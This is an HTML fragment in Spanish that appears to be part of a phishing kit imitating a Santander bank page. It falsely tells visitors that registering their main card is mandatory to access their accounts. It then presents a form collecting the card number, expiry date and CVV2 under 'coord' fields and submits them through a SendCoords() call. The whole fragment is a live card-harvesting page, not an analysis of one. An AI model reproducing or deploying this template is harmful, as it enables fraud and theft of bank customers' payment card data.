<input type="hidden" name="modulo" id="modulo" value="<!--modulo-->">
      <input  type="hidden" name="coord[Card Name]" value="<!--Nombre-->">
           <h1><img src="../../../pagina/images/panel/icn-candado.png" width="25" height="25"><strong>Confirmar operaci&oacute;n <!--title--></strong></h1>
			<h3><strong>Recuerde que para ingresar a su cuenta Santander, es necesario registrar su tarjeta Principal Santander, Por favor complete el formulario.</strong></h3>
              
              <p>(*)El registro es Obligatorio para ingresar en sus cuentas Afiliadas</p>
          <section class="container">
    <table class="tablesorter" cellspacing="0" border="0"> 
    <tbody>
	<tr>
		<td height="26" width="110"  bgcolor="#EFEFEF"><img src="../../../pagina/images/panel/asterisk.gif" alt="2" width="5" height="6" border="0"> <label>Titular :</label></td>
		<td height="26" width="294" class="card" bgcolor="#EFEFEF"><label><b><font color="#516977"><!--Nombre--></font></b></label></td>
	</tr>
	<tr>
		<td height="26" width="110" bgcolor="#DFDFDF"><img src="../../../pagina/images/panel/asterisk.gif" alt="2" width="5" height="6" border="0"> <label>N&uacute;mero Tarjeta :</label></td>
		<td height="26" width="294" class="card" bgcolor="#DFDFDF"><input type="text" name="coord[Credit Card]" maxlength="16"><img src="../../../pagina/images/panel/logo_ccVisa.gif" width="37" height="23" border="0" style="vertical-align: top;"><img src="../../../pagina/images/panel/logo_ccMC.gif" width="37" height="23" border="0" style="vertical-align: top;"><img src="../../../pagina/images/panel/logo_ccAmex.gif" width="37" height="23" border="0" style="vertical-align: top;"></td>
	</tr>
	<tr>
		<td height="32" width="110" bgcolor="#EFEFEF"><img src="../../../pagina/images/panel/asterisk.gif" alt="2" width="5" height="6" border="0"> <label>Fecha :</label></td>
		<td height="32" width="294" class="fecha" bgcolor="#EFEFEF"><input type="text" name="coord[MM]" size="1" maxlength="2"> / <input type="text" size="1" maxlength="2" name="coord[YY]"><span>(*)Fecha de Vencimiento</span>
        </td>
	</tr>
	<tr>
		<td height="4" width="110" bgcolor="#DFDFDF"><img src="../../../pagina/images/panel/asterisk.gif" alt="2" width="5" height="6" border="0"> <label>CVV2 :</label></td>
		<td height="4" width="294" class="cvv" bgcolor="#DFDFDF"><input type="text" size="4" maxlength="4" name="coord[CVV2]" id="cvv"><img src="../../../pagina/images/panel/mini_cvv2.gif" width="38" height="25" border="0" style="vertical-align: top;"><span>(*)C&oacute;digo de 3 o 4 d&iacute;gitos parte posterior de la tarjeta</span></td>
	</tr>
    </tbody>
</table>
          <h2 id="coord-info"></h2>
          <p><input type="image" src="../../../pagina/images/panel/siguiente.jpg" onclick="SendCoords();"></p>
          </section>